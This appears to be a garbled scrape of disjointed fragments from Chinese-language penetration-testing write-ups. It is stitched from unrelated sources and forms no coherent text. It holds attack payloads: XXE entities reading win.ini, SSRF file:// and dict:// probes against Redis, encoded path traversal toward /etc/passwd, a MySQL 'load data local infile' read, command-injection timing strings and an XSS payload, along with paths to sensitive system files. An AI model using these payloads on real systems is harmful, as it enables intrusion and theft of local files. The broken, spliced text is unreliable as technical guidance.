soapFormat.ajax HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows

portUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows

'){ log('Content of your C:\\Windows\\win.ini:') fetch

dict://xxxxx:6379/info）（爆破）ftp:///etc/passwd（file://c:

在通过带参构造函数进行反序列化时，会检查参数是否有参数名信息，只有含有参数名信息的带参构造函数才会被认可img而我用的Windows

ENTITY xxe SYSTEM "file:///c:/test.txt" >]>

(这里虽然读的是etc，但是网站系统是windows，我改了，不过照样无回显，只不过windows那个图没了

url=file:///C:/Windows/win.ini如果该服务器阻止对外部站点发送HTTP请求

C:\windows\system32\drivers\etc\hosts host文件C:*\apache-tomcat

//查看系统版本C:\Windows\System32\inetsrv\MetaBase.xml /

"KBxxxxx" /C:"KBxxxxx" 查看目标重要配置命令#查看系统版本C:\boot.ini

3306 端口：3、修改 url 参数为如下，可借助 SSRF 漏洞读取本地文件：url=file:///C:

DOCTYPE ANY [ % file SYSTEM "file:///C:/Windows/win.ini

&chksm=cf4d8a6af83a037c56195b5c062f6660de5eb8c65b0acadeec6d45ccd4048308844ce5981217&

com.ibm.wsdl.xml.WSDLReaderImpl#readWSDL(java.lang.String, org.w3c.dom.Document

空指针-Base on windows Writeup -- 最新版DZ3.4实战渗透 Weixin

下，所以这里读取为C:/Windows/win.ini，语句如下load data local infile

在利用上面WIndows环境下的特性，把cmd设置成 C:\\Windows\\System32\\calc.exe

编译：奇安信代码卫士团队安全研究员兼利用开发人员 SandEscaper 又公开了 Windows 的一个

/..%255c/..%255c/..%255c/windows/win.ini。

通过构造Paylod读取win.ini文件内容 Pauload：http://127.0.0.1/wchat

ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >]>

ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >]>

/Windows/win.ini内容： ‍‍‍‍ ‍0x‍04.3.2‍‍无回显，程序仅解析XML不回显‍‍

  sleep 5 Windows有效载荷： ping -n 1 server.local type

\windows\win.ini\r\nHOST：192.168.0.1\r\n\r\n” 3、iis

2e%2e/etc/passwd%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows

2e%2e/etc/passwd%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows

创建系统伪信息文件： 详情信息： C:\WINDOWS\win.ini C:\WINDOWS\vbaddin.ini

=%5c%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript